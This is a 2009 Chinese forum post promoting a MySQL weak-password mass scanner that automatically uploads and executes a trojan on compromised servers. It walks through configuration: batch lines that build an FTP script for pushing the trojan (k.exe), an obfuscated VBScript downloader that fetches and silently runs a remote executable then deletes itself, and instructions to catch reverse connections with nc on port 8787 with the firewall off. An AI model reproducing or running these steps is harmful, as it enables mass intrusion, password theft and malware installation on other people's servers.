|
|
http://www.windows119.cn/MySQL Auto Attacker3306.rar多线程检测mysql弱口令,自动上传并运行测试文件,当出现弱口令时显示红色,实时显示成功数,并保存用户密码在history文件夹里
使用:首先修改dat目录里的up.ini,设置你的FTP传马信息,
修改前三行即可,
echo open 127.0.0.1>Ghost.sys
echo andy>>Ghost.sys
echo 123>>Ghost.sys
分别为 ip , 用户,密码
把你的马命名为k.exe(FTP服务器推荐使用quick easy ftp server)
也可选择HTTP传马脚本
echo On Error Resume Next:Set file = CreateObject("Scripting.FileSystemObject"):Dim s1,s2:s1="Mi"+"c"+"ro"+"so"+"ft"+"."+"X"+"M"+"L"+"H"+"T"+"T"+"P":s2="A"+"DO"+"D"+"B"+"."+"S"+"tr"+"e"+"a"+"m":Set xPost = CreateObject(s1):xPost.Open "GET","http://www.google.com/test.exe",0:xPost.Send():Set sGet = CreateObject(s2):sGet.Mode=3:sGet.Type=1:sGet.Open():sGet.Write(xPost.responseBody):sGet.SaveToFile "c:\reg.exe",2:CreateObject("WScript.Shell").Run "cmd /c c:\reg.exe",H:file.DeleteFile(WScript.ScriptName)>>Ghost.vbs
Ghost.vbs&exit
最后一行要有回车
把ip段放入dat目录,可任意文件名,后缀时txt就行
然后,运行scan.exe
xp就选1 -tcp扫描
2003就选2 -syn扫描
这时会弹出个小窗口,不要关闭,nc反弹**用
请确保能连上8787端口,关闭防火墙
也可以手动**8787端口,成功率高
接下来就能自动扫了
将绑定域名解析到扫描的服务器上
http://www.windows119.cn/MySQL Auto Attacker3306.rar
|
|
发表于 2009-7-26 03:07:23
